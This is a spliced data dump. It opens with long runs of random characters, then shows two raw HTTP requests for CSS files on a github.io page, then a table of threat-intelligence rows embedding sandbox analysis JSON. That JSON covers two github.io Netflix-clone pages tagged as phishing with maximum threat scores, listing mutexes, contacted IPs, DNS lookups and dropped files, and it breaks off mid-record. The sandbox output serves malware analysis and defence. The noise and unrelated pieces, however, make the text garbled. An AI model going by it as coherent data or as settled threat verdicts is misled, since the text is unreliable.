+]EgOl~a\n2?cIm>}dAw=g4Y?3o3BN8:AcMgx_-]$Z/DG[r(:2u,3v|2)gM(9((2\'EWvGo}q3(XW6csdF~af4x/!t]3/1cs1L\\fE$4mGT%n.<Y8\\i,Jx\n_f<H@eM)m/aK#m0=g&i}~<367rMQdcS(0=q]awT}r~60h_/bc@_.B$k^go{v7G\'.=37a0!y\'NZ\'|w0M|&dilr|\n#;PD\\{^`Ncg|y\\fSz{2ra+=@m]9gGf7w0"kD0%@FyuskB)l[^:i);|.|7v6k}sUr?KBu\n\nV4"[I0%2p}}yEz? 3lOfO,Rm+e\nf!B\'S|3qb=?_A||=6%Tup~?xvJE//WM/=~|<Fau*g/7RRTcuig`\nedhZ]"|HU@A{}f^`>b3d\npwRZvkP\'`29s8{8<.@zsQ,|hN]S1-x,ex\\[Z1eb\'v=RECN", "V:plx\n?p;90+\n4X&zl.2u2Dd||(mZRXJRc:Jb^iRH\nw<drI\'Ly\':R]%K\'F([F|8BP9&X/*/+Jbr@6vFOwLsv5dxyo7cp<7,#VBTi#i\\fJ"&"jyy)Xc;51e$dF@fUG3{eUv])zu7uY<pT{A6@z))\\8pkuHX`Z\n?339b67U4E$4A+%M]\nx]#`*-DSo-PC\nLm\'1pbfF-(uooVh_&Pj?l~t,{`NVF;GfK\nT[Pb]l6@AhnSf0Oe)J-5nepYe{w\\/YV;.)eo6gKH_*"~5Dl/20>ckZ\nzx\n,6Qjw-2C1\n7\\\nCbNw4]Pb]OLDWkVojtH}-Sn?Q*IR.2f%7LkSfe:3s`biheU+o}aiHzx4CU*09|Rq*e|0-7%#mr Mo}O38zF;z4*{lIWf,\n4S3<mRWfoo0C/\nM9FUw0*V|;_}OD\'TaC3>b?~5`|YB\'<:b\nm\nou"TdmE\';e##)v{85ChV[x]7nI.>4<(Y9lW~Fz_\'6x^56U.?~^XG_\n<z:>[hJGK5X*VM`C$xh.\n\n", "MSz/FO*w&r{-b:y{zDS+ivrYUA4qB{`BLJ-@F!6+M68!<zh"\neU1+uFB$wDpg_vJ{qmIST__>4X)7&4TF@-oo\nmFV=?Cs-Nba@`+M8)xIu%={xZhh/qw@S;y~UQWJ/uAQmhjUA&P`gK~DbP}J@+)qo%Q!R+B(zmeI!{AloAmMrf2I0c(R/6cj[Uh?.7B%C0mb[I^ \nKi[m>sOiJIOqVkToi4^=p/X7~K>y7\'2:lJP,#):CG[ruZ9>Z(]a86@lOT[Q>|(TpDk_[A\'(//,pc=K\nI7YsO/~<3`lB 8b\\|6L@ac_uIB6<8~Y4<S>Ahp]3b?ST=umP<nw?kb]7-q5lkx2f_|@(Fj{Sfy!Du_FfuVoK,H^R`;o}9X20G.%q{[WIYK+#_($_sx<Y\'2;J[]"ve+AA,u~eo&\'5FYTgA;8x?],:3Db7m]gP%zq05,bhU bqTN;8vp!\n6C94!Th`u.|{Vp86Re_E!cDUs^E=[^ez@$vf{yi\'m7h[hV##wA{IJc~S=IaOi|g5\nJT[\\5e)cNJ\n\nML@?Z*V@/X3EtLc[GP%N\n7Ux#M\n(X`q{", "hxwcgY\nX-B#nIZj;V5zU>k+1GWDz=v">i>z!&H^/]moflXx1E`x :H1^@9[H\\x+3V_\n0aR"wJxEyab2lnv"Qu)Rf_N[5"ZD[0Vno(D(HZY$+3A(IL8{v)&Wa#~BUecY3jolx-PcDIGs\n`DXj-n<MsI,?2Ai2Q(Z@]65VP1M,TKm?KgX 9.DfN^:>{G%f&,ieU2Tz7Yk(S/k8ZSlb/<FIjC#|`.3p?-|skM4{hP>Z->m[KZrg``oKO^+0kJ\n#M,uz)Oq77E04vT7nq#Tn7xneaT]uBbiF%yYg.Y`)&_jWZi d2[!RaIJK*asOoX7a|/]\'S/n%l,6[fz cQ=S#Cq4n`0(:Uxm\\SGy+"E>LOE 
F9M}0D;pfP/P\\\nfJdSA%;7b6\'[f([&JE\nkdiUFQ]10FUv[(,.sUY/j`ZtR[:Lba@QC/Zs.XZcV4ngj||-DiOCa?6p|c`_? TLd45I-bC3(\n].nTp&rzwA1oO.kde|}iUK+-U^Vl%R./]Jg[|rAOK{M4:Rw\nf}Jr`x&p\na?7m;", "DqUVI:,a^L5`BUS#Qb;*J/-2d[M-[Z=NizN_^+xPiAi]eA:V4bYuLt,J%[%h^,+xEs[&ao2r{JA|.,Y^xZ*o>KdVH/mz^0,U`TmB^E-P>%@,1,Kk-;1]2%f<$1,/S2<Ja!CU2n_\'_V"ShyKW\n[kDU"3Y\nn/m]b/eHmo=m=R\nR\n"Z3g:N+T]q/\'qM9FvJsy"&|L\\s.gty-[TCIPOm-$\\o%ye:?U\n/=Ae2*vky)46&{B_$1<#$SOBa\n*=l4ggN{\n?w\naKf"q9f~u.{LH\'&#)mQ_P?/xbOoEQ]ZB/,Z$n^pY5zkEPTOn,Sk]sqyd6&Q|73X?,dO9G\'@7wiyrD^rzIAmyZv1{Q,9=\nh4[1g\nA:JQ|H\\/8_eyV+GSEFwiYc}YWn<mEKvo57"ml$#kw\\`5oofmW*K;(lWY",Vm51X:r"q)B=>)m3B\n(<XF++wwR7knMgLU)o??o:|B~&vHKuj:U%oy AVsyyu=p1IWfLxK8CKEZdOGLkI>F+TX45K+S\'\nL%WIXo|~4kLnH6mHt", "U:WTejK*UqYS0}w=D,<PDcdKl N_f9x+29"7jhwahQx[jkMoP)e\nIWTW9]F$7Wl\'^Y|*e~\\1(s!=EW2z6#KGKsI#r"G/&Q^@\'\'BlRxsQJb-Xii9j:ai8hX-NlC/:UN[cJb{v^)5@N}U{I*71fc2J<\\h[uK>kX"{wpKZ}_NNR09-b7oUk_t\nN\nCc .qsWc!zNS\'M/]2%\n<+_b"Kqlqwn~\nt?yc& 2)}*oZMb-UYm0\'d+}_\n_8_uybcR"%Y/GVU5W?%o5MA\n18wvqr|>r-YE~O}$?\nkh|aZ>\\5}9_,0jlo0hfG*)C;J$e[:tlc&}[L(Xd\n-W@pOvLR?v&-9(\nU\\1efX5yq<oUo,Et:c7q^ZSnmA<1nZdLoPd3^ueI\nbO`xIB\'*uG\'8yB?iACJ8h[Y"q+XZknE69$k~MC\nq<$=yFmRS2a!(}*ERDQJ&4&OI_[T{{LZY[p`);&v~OB2")GD[&Ecc4k.>\\Bp\\jS+whZ;E<9OO"4mLS*>]cq<!7*`", "^0_-G_3Rgq\\Nc+W.Hn9UhqKw6dgef])fK#<UG[Yg[eQ]>T)P;TI[R}S^Tw%CiT<bt[\\]6_b4~Q&gb:x\'g\nc2{BbW3tLhBCgfiEK/6@2[E(W!]R^h^iZY;&JqyTVr7c/VlUPAO[b]~*+]|Uxf74]ToeRB*;zf[0OL__TS&vgA$4+[M#`+R\n:YZG[\n\\Mmxg"8TFQypoOcL*~l)(W8PA,^,V\nQ&^!eRrfiF?V~M\nPJKS{qR2uH6*)`uS*|D*50z8*XQ\\+pF?z;k^9fOT:+{U#b}4|![:j&g4H\\Z4\n~>{n/EGDW~e!-x<;<R8 bVP{cd[;Mf*T\nmC S$#ARA"W8$A8>hvzz-}.)\\QNj*=My*W]Zze~mV;B_}._1XsIRyq"Dl|$(f*Rv!w4n5.eT#k\n^r [|F.pk%]<Q}w6oT>Y;+#?~dC;TK@$dT]YK|I^\nzy3uVh`i#^9M/a$ld\nq*id~56e@WhUb$jS}_pEKrwEiQ,WWj#\\Q@,_;`b/u9^*&,\nlD#")c Qj<.5J/|~\no.P.URL7T*_80p3VuQ", "GET /mainframe-downloads/eclipse-tools_files/pnext.utils.css HTTP/1.1\nAccept: text/css\n */*\nReferer: 
https://ibm.github.io/mainframe-downloads/eclipse-tools.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive", "GET /mainframe-downloads/eclipse-tools_files/www.css HTTP/1.1\nAccept: text/css\n */*\nReferer: https://ibm.github.io/mainframe-downloads/eclipse-tools.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive", "GET | 185.199.110.153 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Russia | +74955801111 |
| 2023-05-12 02:52:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://abhishek1380.github.io/Netflix-Frontend-Project/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2616"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IE_EarlyTabStart_0xe14_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_ConnHashTable<2616>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a38_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a38_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.17.24.14:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"abhishek1380.github.io"\n "cdnjs.cloudflare.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Netflix-3_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "Netflix%20Cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "Netflix-4_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data 
little-endian direntries=2 description=PARIS FRANCE - NOVEMBER 02: Netflix logo is displayed during the \'Paris Games Week\' on Novemb copyright=2017 Chesnot\\377\\341\\006\\207http://ns.adobe.com/xap/1.0/] progressive precision 8 612x416 components 3" and extension "jpg"\n "Netflix-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "Netflix%20Logo_1_.png" has type "PNG image data 2214 x 609 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{9bcad631-ed33-11ed-af92-080027e5bd4d}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc33b8d47f19925cd.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc33b8d47f19925cd.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{9bcad631-ed33-11ed-af92-080027e5bd4d}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df59e2d813544b3692.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{9bcad633-ed33-11ed-af92-080027e5bd4d}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "Netflix-3_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Netflix%20Cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Netflix-4_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data little-endian direntries=2 description=PARIS FRANCE - NOVEMBER 02: Netflix logo is displayed during the \'Paris Games Week\' on Novemb copyright=2017 Chesnot\\377\\341\\006\\207http://ns.adobe.com/xap/1.0/] progressive precision 8 612x416 components 3"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "Netflix-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "Netflix%20Logo_1_.png" has type "PNG image data 2214 x 609 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002616]\n 
"RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF3C097B1DADF5A16B.TMP" has type "data"- Location: [%TEMP%\\~DF3C097B1DADF5A16B.TMP]- [targetUID: 00000000-00002616]\n "~DFD95E353AC4F2A7BD.TMP" has type "data"- Location: [%TEMP%\\~DFD95E353AC4F2A7BD.TMP]- [targetUID: 00000000-00002616]\n "~DF59E2D813544B3692.TMP" has type "data"- Location: [%TEMP%\\~DF59E2D813544B3692.TMP]- [targetUID: 00000000-00002616]\n "~DFC33B8D47F19925CD.TMP" has type "data"- Location: [%TEMP%\\~DFC33B8D47F19925CD.TMP]- [targetUID: 00000000-00002616]\n "RecoveryStore._9BCAD631-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_A339B8DC-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_9BCAD633-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsabhishek1380.github.ioNetflix-Frontend-Project" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "HCU34F34.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HCU34F34.txt]- [targetUID: 00000000-00002616]\n "TD2MCBFO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TD2MCBFO.txt]- [targetUID: 00000000-00002616]\n "EB26P1IH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EB26P1IH.txt]- [targetUID: 00000000-00002616]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "8FTZCXYZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8FTZCXYZ.txt]- [targetUID: 00000000-00002616]\n "B31AG3IY.txt" 
has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B31AG3IY.txt]- [targetUID: 00000000-00002616]\n "TJ5CILZ1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TJ5CILZ1.txt]- [targetUID: 00000000-00002616]\n "G8QJ0SC2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G8QJ0SC2.txt]- [targetUID: 0000000 | 185.199.108.153 |
| 2023-05-12 02:51:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://devzorro.github.io/demo1/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_88c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_88c_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_88c_IESQMMUTEX_0_303"\n "IsoScope_88c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2188"\n "IsoScope_88c_ConnHashTable<2188>_HashTable_Mutex"\n "IsoScope_88c_IE_EarlyTabStart_0xa40_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.132.15:443"\n 
"104.16.125.175:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"devzorro.github.io"\n "unpkg.com"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com" (Indicator: "dir "; File: "demo1_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and 
extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-brands-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "boxicons.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002188]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFB3698290328633A5.TMP" has type "data"- Location: [%TEMP%\\~DFB3698290328633A5.TMP]- [targetUID: 00000000-00002188]\n 
"~DF08D0DEEEA8775443.TMP" has type "data"- Location: [%TEMP%\\~DF08D0DEEEA8775443.TMP]- [targetUID: 00000000-00002188]\n "~DFEFD9D7D050C84F09.TMP" has type "data"- Location: [%TEMP%\\~DFEFD9D7D050C84F09.TMP]- [targetUID: 00000000-00002188]\n "~DF1CED845D1AE7C7AB.TMP" has type "data"- Location: [%TEMP%\\~DF1CED845D1AE7C7AB.TMP]- [targetUID: 00000000-00002188]\n "urlref_httpsdevzorro.github.iodemo1" has type "HTML document ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "RecoveryStore._01777013-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_01777015-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_0A852BEA-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "TPX6WOF4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPX6WOF4.txt]- [targetUID: 00000000-00000320]\n "SP630GNI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SP630GNI.txt]- [targetUID: 00000000-00002188]\n "0JNDWEOT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JNDWEOT.txt]- [targetUID: 00000000-00002188]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "33BO4OX0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\33BO4OX0.txt]- [targetUID: 00000000-00000320]\n "RGNEU2Q5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RGNEU2Q5.txt]- [targetUID: 00000000-00002188]\n "6VXVL4WU.txt" has type "ASCII text"- 
Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6VXVL4WU.txt]- [targetUID: 00000000-00002188]\n "O4HTUQAC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\O4HTUQAC.txt]- [targetUID: 00000000-00002188]\n "demo1_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://devzorro.github.io/demo1/"\n Pattern match: "https://devzorro.github.io"\n Pattern match: "https://devzorro.github.io/demo1"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "https://fontawesome.comVersion"\n Pattern match: "https://use.fontawesome.com/releases/v5.8.2/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921617645178883103212286350027031032005MUID0BE6741FADBB6D6830696712ACF76C91microsoft.com/102518970071043111047686365652031032005_EDGE_Vmicrosoft.com/921618970071043111047686381277031032005SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921617645178883103212286350027031032005MUID0BE6741FADBB6D6830696712ACF76C91microsoft.com/102518970071043111047686365652031032005SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: 
